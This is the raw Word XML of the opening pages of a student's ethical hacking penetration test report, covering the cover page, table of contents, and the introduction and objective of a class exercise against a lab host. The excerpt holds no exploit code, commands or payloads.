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E95B" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="4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52320" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7A8BEA47" wp14:editId="06390DEA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>74098</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>-890124</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7560309" cy="1069213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309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0692130">
                              <a:moveTo>
                                <a:pt x="7560005" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="10692003"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="7560005" y="10692003"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="7560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90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16E7B" id="Graphic 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:5.85pt;margin-top:-70.1pt;width:595.3pt;height:841.9pt;z-index:-1596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309,1069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" path="m7560005,l,,,10692003r7560005,l7560005,xe" fillcolor="#1e90ff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A8BEA49" wp14:editId="7A8BEA4A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2160003</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>1464868</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5400040" cy="254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0004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25400">
                              <a:moveTo>
                                <a:pt x="0" y="25311"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="5400001" y="25311"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="5400001" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="25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77C51" id="Graphic 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:170.1pt;margin-top:115.35pt;width:425.2pt;height:2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00040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" path="m,25311r5400001,l5400001,,,,,25311xe" fillcolor="#fffafa" stroked="f">
                <v:path arrowok="t"/>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE95C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5D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5E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5F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60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61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62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63" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="41"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE965" w14:textId="3860A2EA" w:rsidR="005D4D8F" w:rsidRDefault="00363D51">
      <w:pPr>
        <w:spacing w:line="165" w:lineRule="auto"/>
        <w:ind w:left="2101" w:right="1138"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="41"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFAFA"/>
          <w:sz w:val="41"/>
        </w:rPr>
        <w:t>Ethical Hacking Penetration Test</w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFAFA"/>
          <w:sz w:val="41"/>
        </w:rPr>
        <w:t xml:space="preserve"> Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BE6A2C" w14:textId="3C0F6E01" w:rsidR="00363D51" w:rsidRDefault="00363D51">
      <w:pPr>
        <w:spacing w:before="320" w:line="564" w:lineRule="auto"/>
        <w:ind w:left="2101" w:right="1138"/>
        <w:rPr>
          <w:color w:val="FFFAFA"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFAFA"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>By: James Parkinson</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE966" w14:textId="24B1094C" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:spacing w:before="320" w:line="564" w:lineRule="auto"/>
        <w:ind w:left="2101" w:right="1138"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFAFA"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00FE067D" w:rsidRPr="00150CFD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
          </w:rPr>
          <w:t>jparki31@lakers.mercyhurst.edu,</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7A8BE967" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE968" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE969" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE96A" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE96B" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE96C" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE96D" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE96E" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE96F" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="29"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE970" w14:textId="0AB7A159" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="2101"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFAFA"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>202</w:t>
      </w:r>
      <w:r w:rsidR="00FE067D">
        <w:rPr>
          <w:color w:val="FFFAFA"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFAFA"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="007738D6">
        <w:rPr>
          <w:color w:val="FFFAFA"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFAFA"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="007738D6">
        <w:rPr>
          <w:color w:val="FFFAFA"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE971" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:sectPr w:rsidR="005D4D8F">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1920" w:right="1280" w:bottom="280" w:left="1300" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE972" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="41"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE973" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="321"/>
        <w:rPr>
          <w:sz w:val="41"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE974" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:ind w:left="117"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="41"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="41"/>
        </w:rPr>
        <w:t>Contents</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:id w:val="1122728428"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w14:paraId="7A8BE975" w14:textId="3DF679D2" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="5"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:val="left" w:pos="444"/>
              <w:tab w:val="right" w:pos="9188"/>
            </w:tabs>
            <w:spacing w:before="715"/>
            <w:ind w:hanging="327"/>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve">TOC \o "1-4" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_bookmark0" w:history="1">
            <w:r w:rsidR="00363D51">
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t xml:space="preserve">Ethical Hacking Penetration Test </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Report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1</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7A8BE976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1" w:history="1">
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Introduction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1</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7A8BE977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2" w:history="1">
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Objective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1</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7A8BE978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3" w:history="1">
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Requirements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1</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7A8BE979" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="5"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:val="left" w:pos="444"/>
              <w:tab w:val="right" w:pos="9188"/>
            </w:tabs>
            <w:ind w:hanging="327"/>
          </w:pPr>
          <w:hyperlink w:anchor="_bookmark4" w:history="1">
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>High-Level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Summary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2"/>
            </w:rPr>
            <w:t>2</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7A8BE97A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5" w:history="1">
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Recommendations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 w14:paraId="7A8BE97B" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="5"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:val="left" w:pos="444"/>
              <w:tab w:val="right" w:pos="9188"/>
            </w:tabs>
            <w:ind w:hanging="327"/>
          </w:pPr>
          <w:hyperlink w:anchor="_bookmark6" w:history="1">
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Methodologies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3</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7A8BE97C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7" w:history="1">
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Information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Gathering</w:t>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:spacing w:val="-12"/>
            </w:rPr>
            <w:t>3</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7A8BE97D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8" w:history="1">
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Penetration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7A8BE97E" w14:textId="12217B8F" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:numPr>
              <w:ilvl w:val="2"/>
              <w:numId w:val="5"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:val="left" w:pos="1644"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9188"/>
            </w:tabs>
            <w:ind w:hanging="698"/>
          </w:pPr>
          <w:hyperlink w:anchor="_bookmark9" w:history="1">
            <w:r>
              <w:t>System</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>IP: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192.168.</w:t>
            </w:r>
            <w:r w:rsidR="0060792C">
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="0060792C">
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>211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7A8BE97F" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:numPr>
              <w:ilvl w:val="3"/>
              <w:numId w:val="5"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:val="left" w:pos="2539"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9188"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_bookmark10" w:history="1">
            <w:r>
              <w:t>Service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Enumeration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7A8BE980" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:numPr>
              <w:ilvl w:val="3"/>
              <w:numId w:val="5"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:val="left" w:pos="2539"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9188"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_bookmark11" w:history="1">
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Privilege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Escalation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 w14:paraId="7A8BE981" w14:textId="308858EF" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:numPr>
              <w:ilvl w:val="2"/>
              <w:numId w:val="5"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:val="left" w:pos="1644"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9188"/>
            </w:tabs>
            <w:spacing w:before="11"/>
            <w:ind w:hanging="698"/>
          </w:pPr>
          <w:hyperlink w:anchor="_bookmark12" w:history="1">
            <w:r>
              <w:t>System</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-11"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>IP: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192.168.</w:t>
            </w:r>
            <w:r w:rsidR="004F7DC1">
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidR="004F7DC1">
            <w:rPr>
              <w:spacing w:val="-2"/>
            </w:rPr>
            <w:t>211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</w:p>
        <w:p w14:paraId="7A8BE983" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:numPr>
              <w:ilvl w:val="3"/>
              <w:numId w:val="5"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:val="left" w:pos="2539"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9188"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_bookmark14" w:history="1">
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Privilege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Escalation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</w:p>
        <w:p w14:paraId="7A8BE98C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  <w:spacing w:before="11"/>
          </w:pPr>
          <w:hyperlink w:anchor="_bookmark23" w:history="1">
            <w:r>
              <w:t>House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Cleaning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 w14:paraId="7A8BE98D" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="5"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:val="left" w:pos="444"/>
              <w:tab w:val="right" w:pos="9188"/>
            </w:tabs>
            <w:ind w:hanging="327"/>
          </w:pPr>
          <w:hyperlink w:anchor="_bookmark24" w:history="1">
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Additional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Items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9</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7A8BE98E" w14:textId="7777777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25" w:history="1">
            <w:r>
              <w:t>Appendix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Proof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Local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Contents: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 w14:paraId="7A8BE98F" w14:textId="10F74707" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:numPr>
              <w:ilvl w:val="1"/>
              <w:numId w:val="5"/>
            </w:numPr>
            <w:tabs>
              <w:tab w:val="left" w:pos="946"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9188"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_bookmark26" w:history="1">
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Appendix</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="002B4F8C">
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="002B4F8C">
              <w:rPr>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidR="002B4F8C">
            <w:rPr>
              <w:spacing w:val="-2"/>
            </w:rPr>
            <w:t xml:space="preserve"> Used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 w14:paraId="7A8BE990" w14:textId="5096CC84" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F" w:rsidP="00E32CE4">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="946"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9188"/>
            </w:tabs>
            <w:ind w:left="450" w:firstLine="0"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="7A8BE991" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="7A8BE992" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:sectPr w:rsidR="005D4D8F">
          <w:footerReference w:type="default" r:id="rId8"/>
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1920" w:right="1280" w:bottom="1620" w:left="1300" w:header="0" w:footer="1436" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE993" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="41"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE994" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="321"/>
        <w:rPr>
          <w:sz w:val="41"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE995" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="542"/>
        </w:tabs>
        <w:ind w:left="542" w:hanging="425"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="Offensive_Security_OSCP_Exam_Report"/>
      <w:bookmarkStart w:id="1" w:name="_bookmark0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:t>Offensive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2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t>OSCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Exam</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE996" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="41"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE997" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="653"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="653" w:hanging="536"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="Introduction"/>
      <w:bookmarkStart w:id="3" w:name="_bookmark1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr>
          <w:color w:val="272727"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCE279B" w14:textId="243A3A01" w:rsidR="00C554F0" w:rsidRDefault="00C554F0">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="351" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="117" w:right="131" w:hanging="6"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:r w:rsidR="002D26CB">
        <w:t xml:space="preserve">penetration test report contains </w:t>
      </w:r>
      <w:r w:rsidR="006B0985">
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidR="002D26CB">
        <w:t xml:space="preserve"> the gathered information, steps taken, </w:t>
      </w:r>
      <w:r w:rsidR="003157E0">
        <w:t xml:space="preserve">and exploits found on the specified penetration test targets. </w:t>
      </w:r>
      <w:r w:rsidR="00C32BE4">
        <w:t>The purpose of this penetration test is to provide the customer with a complete, understandable, and informat</w:t>
      </w:r>
      <w:r w:rsidR="00BE238E">
        <w:t xml:space="preserve">ive </w:t>
      </w:r>
      <w:r w:rsidR="003D7B6B">
        <w:t xml:space="preserve">document, outlining </w:t>
      </w:r>
      <w:r w:rsidR="006B0985">
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidR="003D7B6B">
        <w:t xml:space="preserve"> the discovered vulnerabilities found on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE999" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="218"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE99A" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="653"/>
        </w:tabs>
        <w:ind w:left="653" w:hanging="536"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="Objective"/>
      <w:bookmarkStart w:id="5" w:name="_bookmark2"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:color w:val="272727"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BC52B1" w14:textId="5FE01F78" w:rsidR="003D7B6B" w:rsidRDefault="003D7B6B">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="351" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="117" w:right="130" w:hanging="6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve">The objective of this penetration test was to </w:t>
      </w:r>
      <w:r w:rsidR="00A1626E">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve">use information taught in class to attack a specified host </w:t>
      </w:r>
      <w:r w:rsidR="00B36BFC">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>and discover vulnerabilities on that host.</w:t>
      </w:r>
      <w:r w:rsidR="004E5823">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> Then, put all information gathered, steps taken, and </w:t>
      </w:r>
      <w:r w:rsidR="00AA0DD9">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>vulnerabilities found and create a full professional report</w:t>
      </w:r>
      <w:r w:rsidR="00B5601C">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BE99C" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="217"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE99D" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="653"/>
        </w:tabs>
